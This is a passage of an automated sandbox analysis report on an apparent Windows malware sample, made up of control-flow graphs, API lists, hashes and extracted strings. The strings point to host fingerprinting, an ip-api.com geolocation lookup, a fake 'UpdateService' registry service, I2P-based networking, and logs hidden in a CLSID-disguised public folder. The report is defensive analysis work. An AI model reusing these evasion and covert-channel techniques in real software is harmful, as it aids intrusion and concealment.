7ff70cad2a27-7ff70cad2a34 963->965 966 7ff70cad2a39-7ff70cad2a3e 963->966 974 7ff70cad2b45-7ff70cad2b47 964->974 975 7ff70cad2bf0-7ff70cad2c0c call 7ff70cad2ef2 964->975 965->966 966->944 969 7ff70cad2a8e-7ff70cad2a94 967->969 970 7ff70cad2a57-7ff70cad2a5a 967->970 976 7ff70cad2e74-7ff70cad2e79 969->976 977 7ff70cad2a9a-7ff70cad2aa0 969->977 972 7ff70cad2a5c-7ff70cad2a5f 970->972 973 7ff70cad2a78-7ff70cad2a7e 970->973 978 7ff70cad2a65-7ff70cad2a68 972->978 979 7ff70cad2e56-7ff70cad2e5b 972->979 981 7ff70cad2a84-7ff70cad2a89 973->981 982 7ff70cad2e6a-7ff70cad2e6f 973->982 974->944 980 7ff70cad2b4d-7ff70cad2baa GetVolumeInformationA 974->980 992 7ff70cad2c11 975->992 976->944 983 7ff70cad2aa6-7ff70cad2aac 977->983 984 7ff70cad2e7e-7ff70cad2e83 977->984 986 7ff70cad2e60-7ff70cad2e65 978->986 987 7ff70cad2a6e-7ff70cad2a73 978->987 979->944 988 7ff70cad2bb0-7ff70cad2bd6 GetLastError call 7ff70cad2ef2 980->988 989 7ff70cad2ca7-7ff70cad2cd9 call 7ff70cad2ef2 980->989 981->944 982->944 990 7ff70cad2aae-7ff70cad2ab3 983->990 991 7ff70cad2ab8-7ff70cad2abd 983->991 984->944 986->944 987->944 997 7ff70cad2c16-7ff70cad2c1c 988->997 998 7ff70cad2bd8 988->998 999 7ff70cad2cdb-7ff70cad2ce7 strlen 989->999 1000 7ff70cad2ced-7ff70cad2cf4 989->1000 990->944 991->944 992->974 1004 7ff70cad2d73-7ff70cad2d78 997->1004 1005 7ff70cad2c22 997->1005 1001 7ff70cad2d5f-7ff70cad2d64 998->1001 1002 7ff70cad2bde-7ff70cad2beb 998->1002 999->1000 1003 7ff70cad2db9-7ff70cad2dbd 999->1003 1006 7ff70cad2cf8-7ff70cad2d55 call 7ff70cad2ef2 1000->1006 1001->944 1002->975 1003->1000 1007 7ff70cad2dc3-7ff70cad2dc7 1003->1007 1004->944 1008 7ff70cad2c24-7ff70cad2c27 1005->1008 1009 7ff70cad2c5b-7ff70cad2c61 1005->1009 1016 7ff70cad2d5a 1006->1016 1007->1000 1013 7ff70cad2dcd-7ff70cad2e00 _errno call 7ff70cade4b0 _errno 1007->1013 1014 7ff70cad2c45-7ff70cad2c4b 1008->1014 1015 7ff70cad2c29-7ff70cad2c2c 1008->1015 1011 7ff70cad2d9b-7ff70cad2da0 1009->1011 1012 7ff70cad2c67-7ff70cad2c6d 1009->1012 1011->944 1021 7ff70cad2c73-7ff70cad2c79 1012->1021 1022 7ff70cad2da5-7ff70cad2daa 1012->1022 1029 7ff70cad2e10-7ff70cad2e33 _errno call 7ff70cad2ef2 1013->1029 1030 7ff70cad2e02-7ff70cad2e05 1013->1030 1019 7ff70cad2d91-7ff70cad2d96 1014->1019 1020 7ff70cad2c51-7ff70cad2c56 1014->1020 1017 7ff70cad2c32-7ff70cad2c35 1015->1017 1018 7ff70cad2d7d-7ff70cad2d82 1015->1018 1016->950 1024 7ff70cad2c3b-7ff70cad2c40 1017->1024 1025 7ff70cad2d87-7ff70cad2d8c 1017->1025 1018->944 1019->944 1020->944 1026 7ff70cad2daf-7ff70cad2db4 1021->1026 1027 7ff70cad2c7f-7ff70cad2c84 1021->1027 1022->944 1024->944 1025->944 1026->944 1027->944 1029->1000 1030->1006 1032 7ff70cad2e0b 1030->1032 1032->1000
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                      • String ID: %$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$service$sys_init
                                                      • API String ID: 3828489143-3798070276
                                                      • Opcode ID: 089b3f22f819f16d5633868e0f01b039814ac1a410c15203a5f55c940dbc9cdb
                                                      • Instruction ID: 17208354fa761fdc0c57ed97fa26cd1fd2eed093933399c79e390d799b98b119
                                                      • Opcode Fuzzy Hash: 089b3f22f819f16d5633868e0f01b039814ac1a410c15203a5f55c940dbc9cdb
                                                      • Instruction Fuzzy Hash: 0CD188E1E0C65781FA20BB54FC40BB8E660AF40759FD51232C98F176A8DF6DAD84D3A1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1034 7ffdac12bc77-7ffdac12bc97 1035 7ffdac12bd05-7ffdac12bd0d 1034->1035 1036 7ffdac12bc99-7ffdac12bca1 1034->1036 1039 7ffdac12bd0f-7ffdac12bd14 1035->1039 1040 7ffdac12bd20-7ffdac12bd36 call 7ffdac12689b 1035->1040 1037 7ffdac12bcb0-7ffdac12bcb8 1036->1037 1038 7ffdac12bca3-7ffdac12bcaa 1036->1038 1043 7ffdac12bcbe-7ffdac12bcc6 1037->1043 1044 7ffdac12c387 1037->1044 1038->1037 1042 7ffdac12c0b3-7ffdac12c0cd call 7ffdac12689b 1038->1042 1045 7ffdac12bd16-7ffdac12bd1b 1039->1045 1046 7ffdac12bd3b-7ffdac12bd40 1039->1046 1047 7ffdac12c38c-7ffdac12c39d 1040->1047 1042->1037 1060 7ffdac12c0d3-7ffdac12c0db 1042->1060 1051 7ffdac12bcc8-7ffdac12bccf 1043->1051 1052 7ffdac12bcdb-7ffdac12bce6 1043->1052 1044->1047 1045->1047 1049 7ffdac12bd6f-7ffdac12beba call 7ffdac1222f5 call 7ffdac127400 call 7ffdac125ec9 1046->1049 1050 7ffdac12bd42-7ffdac12bd48 1046->1050 1092 7ffdac12bec0-7ffdac12beee call 7ffdac12d3f2 1049->1092 1093 7ffdac12c039-7ffdac12c06e call 7ffdac123805 1049->1093 1050->1049 1054 7ffdac12bd4a-7ffdac12bd6a 1050->1054 1051->1052 1056 7ffdac12bcd1-7ffdac12bcd9 1051->1056 1057 7ffdac12c39e-7ffdac12c3a3 1052->1057 1058 7ffdac12bcec-7ffdac12bcf5 1052->1058 1054->1047 1056->1052 1056->1058 1057->1047 1062 7ffdac12c22d-7ffdac12c253 1058->1062 1063 7ffdac12bcfb-7ffdac12bd00 1058->1063 1066 7ffdac12c0e1-7ffdac12c0f2 1060->1066 1067 7ffdac12c167-7ffdac12c182 call 7ffdac12689b call 7ffdac12b910 1060->1067 1064 7ffdac12c3a5-7ffdac12c3aa 1062->1064 1065 7ffdac12c259-7ffdac12c260 1062->1065 1063->1047 1064->1047 1069 7ffdac12c26f-7ffdac12c295 GetProcessHeap HeapAlloc 1065->1069 1070 7ffdac12c262-7ffdac12c26c 1065->1070 1071 7ffdac12c10d-7ffdac12c116 1066->1071 1072 7ffdac12c0f4-7ffdac12c10b 1066->1072 1067->1047 1075 7ffdac12c297-7ffdac12c2d9 memcpy call 7ffdac129100 1069->1075 1076 7ffdac12c309-7ffdac12c324 call 7ffdac1277a2 1069->1076 1070->1069 1071->1067 1077 7ffdac12c118-7ffdac12c120 1071->1077 1072->1067 1072->1071 1095 7ffdac12c2df 1075->1095 1096 7ffdac12c378-7ffdac12c37b 1075->1096 1076->1047 1081 7ffdac12c122-7ffdac12c129 1077->1081 1082 7ffdac12c135-7ffdac12c140 1077->1082 1081->1082 1088 7ffdac12c12b-7ffdac12c133 1081->1088 1089 7ffdac12c142-7ffdac12c14a 1082->1089 1090 7ffdac12c187 call 7ffdac12b9f4 1082->1090 1088->1082 1088->1089 1098 7ffdac12c196-7ffdac12c1b0 call 7ffdac12689b 1089->1098 1099 7ffdac12c14c-7ffdac12c162 call 7ffdac12689b 1089->1099 1101 7ffdac12c18c-7ffdac12c191 1090->1101 1110 7ffdac12bef0-7ffdac12bef8 1092->1110 1111 7ffdac12befe-7ffdac12bf0a call 7ffdac1268e2 1092->1111 1093->1092 1114 7ffdac12c074-7ffdac12c087 call 7ffdac12ea90 1093->1114 1103 7ffdac12c2e4-7ffdac12c2e7 1095->1103 1105 7ffdac12c33a-7ffdac12c33c 1096->1105 1120 7ffdac12c1b2-7ffdac12c1b7 1098->1120 1121 7ffdac12c1bc-7ffdac12c228 call 7ffdac1222f5 call 7ffdac12689b call 7ffdac1261a2 1098->1121 1099->1047 1101->1047 1103->1047 1113 7ffdac12c2ed-7ffdac12c304 GetProcessHeap HeapFree 1103->1113 1108 7ffdac12c34d-7ffdac12c35c call 7ffdac12917d 1105->1108 1109 7ffdac12c33e-7ffdac12c346 1105->1109 1108->1095 1130 7ffdac12c35e-7ffdac12c36c call 7ffdac12bc0e 1108->1130 1109->1108 1116 7ffdac12c348-7ffdac12c34b 1109->1116 1110->1111 1117 7ffdac12c08c-7ffdac12c0ae memcpy 1110->1117 1128 7ffdac12bf0c-7ffdac12bf21 1111->1128 1129 7ffdac12bf29-7ffdac12bf3f call 7ffdac126a68 1111->1129 1113->1047 1114->1092 1116->1108 1123 7ffdac12c326-7ffdac12c336 call 7ffdac1291ee 1116->1123 1117->1111 1120->1047 1121->1047 1123->1105 1128->1129 1140 7ffdac12bf64-7ffdac12bfab call 7ffdac129370 1129->1140 1141 7ffdac12bf41-7ffdac12bf5d 1129->1141 1142 7ffdac12c37d-7ffdac12c382 1130->1142 1143 7ffdac12c36e-7ffdac12c373 1130->1143 1148 7ffdac12bfdf-7ffdac12bfe7 1140->1148 1149 7ffdac12bfad-7ffdac12bfb5 1140->1149 1141->1140 1142->1103 1143->1103 1150 7ffdac12c000-7ffdac12c034 call 7ffdac1261a2 1148->1150 1151 7ffdac12bfe9-7ffdac12bffa GetProcessHeap HeapFree 1148->1151 1149->1148 1152 7ffdac12bfb7-7ffdac12bfd2 call 7ffdac121290 1149->1152 1150->1047 1151->1150 1152->1148 1157 7ffdac12bfd4-7ffdac12bfd8 1152->1157 1157->1148
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $--TSCB--$-ILCCNC-$-ILCCNC-$-ILCCNC-$-VRSCNC-$/line?fields=query$AKAK$AKAK$KCIT$Referer$SYSTEM\CurrentControlSet\Services\UpdateService\Parameters$TPCR$[E] (%s) -> Memory allocation failed(size=%llu)$curl/8.4.0$ip-api.com$last-patch$mem_alloc
                                                      • API String ID: 0-4235120829
                                                      • Opcode ID: ea766b0194d0735c9a06e82f94f96268db425a52bb65e6141467e31f6e78e82a
                                                      • Instruction ID: f73ccab974bafc5c9beab7d22869ad2c0e8431e2d7dfdd56ee6583767d60b3d6
                                                      • Opcode Fuzzy Hash: ea766b0194d0735c9a06e82f94f96268db425a52bb65e6141467e31f6e78e82a
                                                      • Instruction Fuzzy Hash: E312916BB0AB8281F6629B15E4A03B963A0FB447F4F504236DA5D477D6DF3CE401C70A

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen$strcat$HandleLibraryLoadModule
                                                      • String ID: --conf=$--datadi$--reseed$.file=$C_InitI2P$C_StartI2P$Done$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$i2p$i2p$i2p.conf$i2p.su3$i2p.su3$i2p_init$libi2p.dll
                                                      • API String ID: 1893813203-492052463
                                                      • Opcode ID: 281965a8cca0299f78d8a16ea7cf8d59cb056eb3e7200e21da36b81dc5a84790
                                                      • Instruction ID: e97f43f785e6c43bca882cdb116e93ddbe9eb3048a55e2cee952760121775e26
                                                      • Opcode Fuzzy Hash: 281965a8cca0299f78d8a16ea7cf8d59cb056eb3e7200e21da36b81dc5a84790
                                                      • Instruction Fuzzy Hash: 3271AE37B0EB8281FB629B05E4A03EA6291EB847D4F440031DA8D1B79BEF7CE515C744

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1249 7ffda55ac9fc-7ffda55aca24 InitializeCriticalSectionAndSpinCount 1250 7ffda55aca2a-7ffda55aca5e call 7ffda55ab930 call 7ffda55a466b 1249->1250 1251 7ffda55acb50-7ffda55acb71 GetLastError call 7ffda55ac852 1249->1251 1264 7ffda55acb29-7ffda55acb41 call 7ffda55ac852 1250->1264 1265 7ffda55aca64-7ffda55aca7b strlen 1250->1265 1257 7ffda55acb73 1251->1257 1258 7ffda55acb92-7ffda55acb98 1251->1258 1259 7ffda55acb79-7ffda55acb86 1257->1259 1260 7ffda55acc51-7ffda55acc56 1257->1260 1261 7ffda55acc5b 1258->1261 1262 7ffda55acb9e-7ffda55acba4 1258->1262 1259->1258 1260->1264 1272 7ffda55acc65-7ffda55acc6a 1261->1272 1266 7ffda55acba6-7ffda55acbac 1262->1266 1267 7ffda55acbd0-7ffda55acbd3 1262->1267 1283 7ffda55acb46-7ffda55acb4f 1264->1283 1268 7ffda55aca7d-7ffda55aca80 1265->1268 1269 7ffda55aca93-7ffda55aca96 1265->1269 1270 7ffda55acc79-7ffda55acc7e 1266->1270 1271 7ffda55acbb2-7ffda55acbb8 1266->1271 1273 7ffda55acbd5-7ffda55acbd8 1267->1273 1274 7ffda55acbed-7ffda55acbf3 1267->1274 1268->1269 1276 7ffda55aca82-7ffda55aca8f strlen 1268->1276 1277 7ffda55acab8-7ffda55acb01 strlen fopen 1269->1277 1278 7ffda55aca98-7ffda55acab2 strcat strlen 1269->1278 1270->1264 1279 7ffda55acbbe-7ffda55acbc4 1271->1279 1280 7ffda55acc83-7ffda55acc88 1271->1280 1272->1264 1281 7ffda55acc47 1273->1281 1282 7ffda55acbda-7ffda55acbdd 1273->1282 1284 7ffda55acbf5-7ffda55acbfa 1274->1284 1285 7ffda55acc6f 1274->1285 1276->1269 1286 7ffda55acb07-7ffda55acb23 call 7ffda55ac852 1277->1286 1287 7ffda55acc1d-7ffda55acc38 call 7ffda55ac852 1277->1287 1278->1277 1288 7ffda55acbc6-7ffda55acbcb 1279->1288 1289 7ffda55acbff-7ffda55acc04 1279->1289 1280->1264 1281->1260 1282->1272 1290 7ffda55acbe3-7ffda55acbe8 1282->1290 1284->1264 1285->1270 1286->1264 1295 7ffda55acc8d-7ffda55acca7 call 7ffda55ac852 1286->1295 1287->1264 1288->1264 1289->1264 1290->1264 1295->1283
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                      • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$rdpctl.l$~
                                                      • API String ID: 3395718042-1794035234
                                                      • Opcode ID: 88fdb2c0a27574724d13a40fae328aa821ff84609621954b912e3e513a2910a1
                                                      • Instruction ID: 2ee25a97101468f5d2a8e66d88773a112b29faf5769452fe3b70177d157d8580
                                                      • Opcode Fuzzy Hash: 88fdb2c0a27574724d13a40fae328aa821ff84609621954b912e3e513a2910a1
                                                      • Instruction Fuzzy Hash: FE517468F0E60F85FB125F50E8B83B91290AF07F44F815432D60E463E3EE6EA945834D

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1298 7ffda55d9f6c-7ffda55d9f94 InitializeCriticalSectionAndSpinCount 1299 7ffda55d9f9a-7ffda55d9fce call 7ffda55d4ac0 call 7ffda55d89db 1298->1299 1300 7ffda55da0c0-7ffda55da0e1 GetLastError call 7ffda55d9dc2 1298->1300 1313 7ffda55da099-7ffda55da0b1 call 7ffda55d9dc2 1299->1313 1314 7ffda55d9fd4-7ffda55d9feb strlen 1299->1314 1305 7ffda55da102-7ffda55da108 1300->1305 1306 7ffda55da0e3 1300->1306 1308 7ffda55da1cb 1305->1308 1309 7ffda55da10e-7ffda55da114 1305->1309 1310 7ffda55da0e9-7ffda55da0f6 1306->1310 1311 7ffda55da1c1-7ffda55da1c6 1306->1311 1322 7ffda55da1d5-7ffda55da1da 1308->1322 1315 7ffda55da116-7ffda55da11c 1309->1315 1316 7ffda55da140-7ffda55da143 1309->1316 1310->1305 1311->1313 1325 7ffda55da0b6-7ffda55da0bf 1313->1325 1318 7ffda55da003-7ffda55da006 1314->1318 1319 7ffda55d9fed-7ffda55d9ff0 1314->1319 1320 7ffda55da1e9-7ffda55da1ee 1315->1320 1321 7ffda55da122-7ffda55da128 1315->1321 1323 7ffda55da145-7ffda55da148 1316->1323 1324 7ffda55da15d-7ffda55da163 1316->1324 1329 7ffda55da028-7ffda55da071 strlen fopen 1318->1329 1330 7ffda55da008-7ffda55da022 strcat strlen 1318->1330 1319->1318 1326 7ffda55d9ff2-7ffda55d9fff strlen 1319->1326 1320->1313 1327 7ffda55da1f3-7ffda55da1f8 1321->1327 1328 7ffda55da12e-7ffda55da134 1321->1328 1322->1313 1331 7ffda55da14a-7ffda55da14d 1323->1331 1332 7ffda55da1b7 1323->1332 1333 7ffda55da165-7ffda55da16a 1324->1333 1334 7ffda55da1df 1324->1334 1326->1318 1327->1313 1335 7ffda55da136-7ffda55da13b 1328->1335 1336 7ffda55da16f-7ffda55da174 1328->1336 1337 7ffda55da077-7ffda55da093 call 7ffda55d9dc2 1329->1337 1338 7ffda55da18d-7ffda55da1a8 call 7ffda55d9dc2 1329->1338 1330->1329 1331->1322 1339 7ffda55da153-7ffda55da158 1331->1339 1332->1311 1333->1313 1334->1320 1335->1313 1336->1313 1337->1313 1344 7ffda55da1fd-7ffda55da217 call 7ffda55d9dc2 1337->1344 1338->1313 1339->1313 1344->1325
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                      • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$prgmgr.l$~
                                                      • API String ID: 3395718042-2735303109
                                                      • Opcode ID: 2b34912e1a9934fbd2b939a990e0fc4d54a93500ffd10429cb98db274252f84d
                                                      • Instruction ID: 0a9d6ea1f204e6a59c7b55a19327f1b4eb3a0a8a6642ff9eab131f0c351420df
                                                      • Opcode Fuzzy Hash: 2b34912e1a9934fbd2b939a990e0fc4d54a93500ffd10429cb98db274252f84d
                                                      • Instruction Fuzzy Hash: 3251FA6BB1E68BC1FA23DF50E8A03B91251AB47F84F940032C90D463A3DE6DF9568349
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                      • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$dwlmgr.l$log$~
                                                      • API String ID: 3395718042-2859552336
                                                      • Opcode ID: ca29e854a188975124b211bdff223b2d995ccf5de1fb749ea05665b3032efd6b
                                                      • Instruction ID: 24f86947d440515c6b527128680cfe5f7ab1213e582a20e56252f991a1f4c905
                                                      • Opcode Fuzzy Hash: ca29e854a188975124b211bdff223b2d995ccf5de1fb749ea05665b3032efd6b
                                                      • Instruction Fuzzy Hash: 30515D11F0F75781FA219711E8B03B81259AF657E4F980032C90E063ABDF6CE995E38D

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1200 7ffda557427c-7ffda55742a4 InitializeCriticalSectionAndSpinCount 1201 7ffda55743d0-7ffda55743f1 GetLastError call 7ffda55740d2 1200->1201 1202 7ffda55742aa-7ffda55742de call 7ffda5572700 call 7ffda557ce6b 1200->1202 1207 7ffda55743f3 1201->1207 1208 7ffda5574412-7ffda5574418 1201->1208 1215 7ffda55742e4-7ffda55742fb strlen 1202->1215 1216 7ffda55743a9-7ffda55743c1 call 7ffda55740d2 1202->1216 1210 7ffda55744d1-7ffda55744d6 1207->1210 1211 7ffda55743f9-7ffda5574406 1207->1211 1213 7ffda557441e-7ffda5574424 1208->1213 1214 7ffda55744db 1208->1214 1210->1216 1211->1208 1217 7ffda5574450-7ffda5574453 1213->1217 1218 7ffda5574426-7ffda557442c 1213->1218 1219 7ffda55744e5-7ffda55744ea 1214->1219 1223 7ffda5574313-7ffda5574316 1215->1223 1224 7ffda55742fd-7ffda5574300 1215->1224 1235 7ffda55743c6-7ffda55743cf 1216->1235 1220 7ffda557446d-7ffda5574473 1217->1220 1221 7ffda5574455-7ffda5574458 1217->1221 1225 7ffda5574432-7ffda5574438 1218->1225 1226 7ffda55744f9-7ffda55744fe 1218->1226 1219->1216 1233 7ffda55744ef 1220->1233 1234 7ffda5574475-7ffda557447a 1220->1234 1231 7ffda557445a-7ffda557445d 1221->1231 1232 7ffda55744c7 1221->1232 1229 7ffda5574338-7ffda5574381 strlen fopen 1223->1229 1230 7ffda5574318-7ffda5574332 strcat strlen 1223->1230 1224->1223 1236 7ffda5574302-7ffda557430f strlen 1224->1236 1227 7ffda5574503-7ffda5574508 1225->1227 1228 7ffda557443e-7ffda5574444 1225->1228 1226->1216 1227->1216 1237 7ffda557447f-7ffda5574484 1228->1237 1238 7ffda5574446-7ffda557444b 1228->1238 1239 7ffda557449d-7ffda55744b8 call 7ffda55740d2 1229->1239 1240 7ffda5574387-7ffda55743a3 call 7ffda55740d2 1229->1240 1230->1229 1231->1219 1241 7ffda5574463-7ffda5574468 1231->1241 1232->1210 1233->1226 1234->1216 1236->1223 1237->1216 1238->1216 1239->1216 1240->1216 1246 7ffda557450d-7ffda5574527 call 7ffda55740d2 1240->1246 1241->1216 1246->1235
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
